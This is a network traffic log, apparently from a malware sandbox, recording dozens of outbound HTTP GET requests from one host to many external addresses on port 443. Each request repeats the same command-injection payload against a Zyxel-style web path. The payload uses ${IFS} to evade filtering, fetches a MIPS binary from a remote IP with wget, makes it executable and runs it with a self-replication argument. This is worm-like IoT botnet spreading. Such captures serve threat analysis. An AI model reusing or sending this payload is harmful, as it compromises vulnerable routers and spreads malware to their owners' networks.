                                      Jan 14, 2024 15:50:39.122786045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2521192.168.2.144793094.169.176.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122826099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2522192.168.2.1447224176.20.34.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122885942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2523192.168.2.1460034219.43.220.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122931957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2524192.168.2.1450642160.119.28.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122965097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2525192.168.2.1445998135.90.206.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.122992992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2526192.168.2.1443596205.170.46.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123042107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2527192.168.2.1457406143.207.113.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123085976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2528192.168.2.1436910162.81.160.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123109102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2529192.168.2.1453084192.216.190.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123150110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2530192.168.2.1444208149.236.105.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123209953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2531192.168.2.1444790107.46.89.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123224020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2532192.168.2.144937099.6.3.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123276949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2533192.168.2.1439722188.0.97.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123323917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2534192.168.2.1449116123.34.7.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123363972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2535192.168.2.1451594113.66.45.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123398066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2536192.168.2.1454672145.210.166.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123449087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2537192.168.2.1441640112.126.104.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123482943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2538192.168.2.143409013.0.143.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123507977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2539192.168.2.1444920124.223.217.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123572111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2540192.168.2.1433974116.12.205.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123606920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2541192.168.2.1448844193.254.29.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123639107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2542192.168.2.1444910110.49.239.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123671055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2543192.168.2.146000675.40.18.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123708963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2544192.168.2.1443832126.162.34.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123754978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2545192.168.2.1460390203.212.160.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123785019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2546192.168.2.145359020.52.89.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123837948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2547192.168.2.1459532133.247.82.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123859882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2548192.168.2.143851466.70.96.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123905897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2549192.168.2.1448160205.216.38.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123948097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2550192.168.2.1439468149.197.166.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.123985052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2551192.168.2.1450050193.162.95.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124022961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2552192.168.2.143764423.18.232.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124047995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2553192.168.2.1455288115.204.235.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124097109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2554192.168.2.1455616112.23.179.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124145031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2555192.168.2.1437184191.211.158.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124187946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2556192.168.2.1459940135.55.61.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124217033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2557192.168.2.1439868117.230.241.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124249935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2558192.168.2.1441734169.63.237.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124279976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2559192.168.2.1442920157.65.230.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124325037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2560192.168.2.145270464.206.92.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124377966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2561192.168.2.1458876217.163.106.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124423981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2562192.168.2.143751631.65.254.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124444962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2563192.168.2.145644678.184.200.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124459982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2564192.168.2.1434828210.217.121.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124497890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2565192.168.2.146055678.233.240.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124541998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2566192.168.2.1438412190.45.237.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124567986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2567192.168.2.1456078166.237.242.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124599934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2568192.168.2.143747459.157.196.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124634027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2569192.168.2.1434700162.169.79.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124660969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2570192.168.2.145913463.110.196.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124699116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2571192.168.2.1459492166.125.138.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124757051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2572192.168.2.1444218109.60.208.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124779940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2573192.168.2.145618499.123.220.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124821901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2574192.168.2.144723624.82.189.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124857903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2575192.168.2.144428642.104.73.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124897957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2576192.168.2.1441626195.215.234.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124917030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2577192.168.2.143936694.4.242.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.124974012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2578192.168.2.1440966121.143.99.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125016928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2579192.168.2.1450142140.187.56.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125055075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2580192.168.2.145601857.30.203.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125114918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2581192.168.2.144194812.143.40.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125158072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2582192.168.2.1457272185.75.218.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.125193119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2583192.168.2.1452614186.174.79.185443
                                      TimestampBytes transferredDirectionData
